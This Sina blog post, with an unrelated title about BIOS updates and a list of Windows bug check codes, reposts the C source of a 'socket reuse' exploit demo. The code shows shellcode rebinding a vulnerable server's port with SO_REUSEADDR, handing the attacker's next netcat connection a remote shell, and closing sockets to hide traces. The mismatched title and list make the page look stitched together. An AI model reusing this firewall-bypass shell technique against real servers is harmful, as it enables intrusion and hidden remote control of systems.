加载中…
个人资料
deathon_eypjoina
deathon_eypjoina
  • 博客等级:
  • 博客积分:0
  • 博客访问:4,774
  • 关注人气:1
  • 获赠金笔:0支
  • 赠出金笔:0支
  • 荣誉徽章:
相关博文
推荐博文
谁看过这篇博文
加载中…
正文 字体大小:

UpdatesBenefits of BIOS,Destroy All!!!

(2007-07-24 11:38:19)
Bug Check 0x1E: KMODE_EXCEPTION_NOT_HANDLED
Bug Check 0x0A: IRQL_NOT_LESS_OR_EQUAL
Bug Check 0x2E: DATA_BUS_ERROR
Bug Check 0x7B: INACCESSIBLE_BOOT_DEVICE
Bug Check 0x7F: UNEXPECTED_KERNEL_MODE_TRAP
Bug Check 0x50: PAGE_FAULT_IN_NONPAGED_AREA
Bug Check 0x77: KERNEL_STACK_INPAGE_ERROR
Bug Check 0x7A: KERNEL_DATA_INPAGE_ERROR
Exception Code 0xC0000221: STATUS_IMAGE_CHECKSUM_MISMATCH
/*----------------------------------------------------------------------------
*
* REUSE EXPLOIT
* =============
* General idea
* ----------------
* To bypass the firwall, connect to the port that has already been opened by the attacked
* process, and rebind. All further connections to the server must be processed on your own.
* To achieve this it is enought to assign the SO_REUSEADDR to the socket.
*
*
* Implementation
* --------------
* Create a new socket, call the setsockopt function, after which bind, and
* then everyting goes as usual.
*
*
* Problems
* --------
* Under w2k (and, possibly, under other operating systems)
* there is some probability that socket reust would fail, and the control
* is passed to the previous socket owner instead of the shellcode.
* Therefore, the hacker has to repeat an attempt.

*
* Demonstration
* -------------
* Start this expoit on the attacked computer and connect to it
* using telnet from the attacker host (this step corresponds to connection 
* to the vulnerable server and passing the shellcode). Now connect to the
* target host again. If everything goes OK, you'll receive the remote shell
* even if the firewall configuration is highly restrictive.
*
* > Target: reuse.exe
* > Attacker: netcat "target_address" 80  <- sending shellcode
* > Attacker: netcat "target_address" 80  <- passing commands to the shell
----------------------------------------------------------------------------*/
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include "spawn.h"

#define V_PORT 80 // Port of the vulnerable application

int main()
{

int a;
    int n_reuse=200;
SOCKET lsocket;
    SOCKET rsocket;
    SOCKET csocket;
struct sockaddr_in laddr, caddr, raddr, taddr;

char buff[MAX_BUF_SIZE]; // Buffer

int raddr_size = sizeof(raddr);
int taddr_size = sizeof(taddr);

printf("exploit reuse socket demo\n");

// THIS CODE IS EXECUTED BY THE VULNERABLE SERVER (FOR EXAMPLE, WEB SERVER)
// TO WHICH THE ATTACKER ESTABLISHES A CONNECTION AND PASSES THE SHELLCODE
// TO WHICH LATER THE CONTROL WILL BE PASSED.
//-------------------------------------------------------------------------
// Step 0: Initialization of the sockets library
if (WSAStartup(0x0202, (WSADATA*) &buff[0])) return -1;

// Step 0: Creating a socket
lsocket = socket(AF_INET, SOCK_STREAM, 0);

// Step 0: Binding the socket to the local address
laddr.sin_family = AF_INET;
laddr.sin_port = htons(V_PORT);
laddr.sin_addr.s_addr = INADDR_ANY;
if (bind(lsocket,(struct sockaddr *) &laddr, sizeof(laddr))) return -1;

// Step 0: Listening
if (listen(lsocket, 0x10)) return -1;
printf("server waits for connection on %d port...",V_PORT);

// Step 0: Retrieve a message from the queue
// _without_ saving the returned socket descriptor, because
// shellcode will be unable to access it anyway
accept(lsocket, (struct sockaddr *) &taddr, &taddr_size);
//========================================================================
// END OF THE SERVER CODE

//
// ...
//


//
// ...
//

/*  SHELL_CODE_ENTRY_POINT */
// THE SHELLCODE ENTRY POINT:
// FROM HERE THE SHELLCODE GETS THE CONTROL
// ALTHOUGH ITS CONNECTION TO THE HACKER'S COMPUTER HAS ALREADY BEEN ESTABLISHED
// THE SHELLCODE DOESN'T KNOW ANYTHING ABOUT THE SOCKET DESCRIPTOR OF THIS CONNECTION.
// THEREFORE, IT BINDS A VULNERABLE PORT AGAIN, CAPTURING _FURTHER_ CONNECTIONS
//-----------------------------------------------------------------------

// Step 1: Creating a socket
rsocket = socket(AF_INET, SOCK_STREAM, 0);

// Step 2: Changing socket attributes to SO_REUSEADDR
        if (setsockopt(rsocket, SOL_SOCKET , SO_REUSEADDR , (char*)&n_reuse, sizeof(n_reuse))) return -1;

// Step 3: Binding the socket to local address
raddr.sin_family = AF_INET;
raddr.sin_port = htons(V_PORT); // Vulnerable port
raddr.sin_addr.s_addr = INADDR_ANY;
if (bind(rsocket,(struct sockaddr *) &raddr, sizeof(raddr))) return -1;

// Step 4: Listening
// In case of further connections to the vulnerable port,  the control will
// be passed to the shellcode instead of the server code, and this port will
// be opened at the firewall because the firewall will consider it
// a legal port of a network service.
if (listen(rsocket, 0x1)) return -1;

        // Step 5: Retrieve a message from the queue
csocket = accept(rsocket, (struct sockaddr *) &raddr, &raddr_size);

// Step 6: Exchange commands with the socket
sshell((SOCKET) csocket, MAX_BUF_SIZE);

// Step 7 - clear the traces of the hacker's activity
   closesocket(rsocket);
closesocket(csocket);

// END OF THE SHELLCODE
//========================================================================


//
// ...
//


// RETURNING TO THE SERVER CODE
//------------------------------------------------------------------------
// Clear all traces of the hacking activity
closesocket(lsocket);
WSACleanup();

return 0;
}

///...../http://cdcontent.books24x7.com/id_13466/reuse.c-----------/
 

0

阅读 评论 收藏 转载 喜欢 打印举报/Report
  • 评论加载中,请稍候...
发评论

    发评论

    以上网友发言只代表其个人观点,不代表新浪网的观点或立场。

      

    新浪BLOG意见反馈留言板 欢迎批评指正

    新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 会员注册 | 产品答疑

    新浪公司 版权所有